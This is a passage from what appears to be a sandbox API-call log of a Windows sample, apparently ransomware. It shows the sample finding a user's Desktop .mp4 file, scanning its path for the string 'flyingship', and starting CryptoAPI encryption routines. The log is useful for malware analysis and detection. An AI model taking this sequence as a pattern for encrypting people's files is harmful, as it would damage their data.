lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0167.863] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0167.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.863] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0167.864] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0167.864] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0167.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0167.864] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebdc050, ftCreationTime.dwHighDateTime=0x1d5e739, ftLastAccessTime.dwLowDateTime=0xfe74e650, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0xfe74e650, ftLastWriteTime.dwHighDateTime=0x1d5dcab, nFileSizeHigh=0x0, nFileSizeLow=0x1828a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="urMVeYqgrC9wPF_WA.mp4", cAlternateFileName="URMVEY~1.MP4")) returned 0x90add8 [0167.866] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0167.867] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.867] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebdc050, ftCreationTime.dwHighDateTime=0x1d5e739, ftLastAccessTime.dwLowDateTime=0xfe74e650, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0xfe74e650, ftLastWriteTime.dwHighDateTime=0x1d5dcab, nFileSizeHigh=0x0, nFileSizeLow=0x1828a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="urMVeYqgrC9wPF_WA.mp4", cAlternateFileName="URMVEY~1.MP4")) returned 0x90add8 [0167.867] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0167.867] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.867] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.867] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.867] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.867] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.867] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.867] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="urMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rMVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MVeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VeYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eYqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YqgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qgrC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="grC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rC9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wPF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PF_WA.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.869] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0167.869] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0167.869] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.870] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.870] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.870] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.870] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.870] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.870] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebdc050, ftCreationTime.dwHighDateTime=0x1d5e739, ftLastAccessTime.dwLowDateTime=0xfe74e650, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0xfe74e650, ftLastWriteTime.dwHighDateTime=0x1d5dcab, nFileSizeHigh=0x0, nFileSizeLow=0x1828a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="urMVeYqgrC9wPF_WA.mp4", cAlternateFileName="URMVEY~1.MP4")) returned 0x90ae18 [0167.870] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0167.870] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.870] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.870] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.870] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.870] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0167.870] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.870] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0167.871] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.871] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.871] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0167.871] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.871] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.871] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.871] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.871] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.871] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0167.871] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.871] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0167.872] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.872] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.873] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0167.873] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.873] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.873] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0167.873] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.873] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.873] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.873] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.873] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.874] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.874] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.874] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.874] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.874] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.874] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.874] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.874] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.874] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0167.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 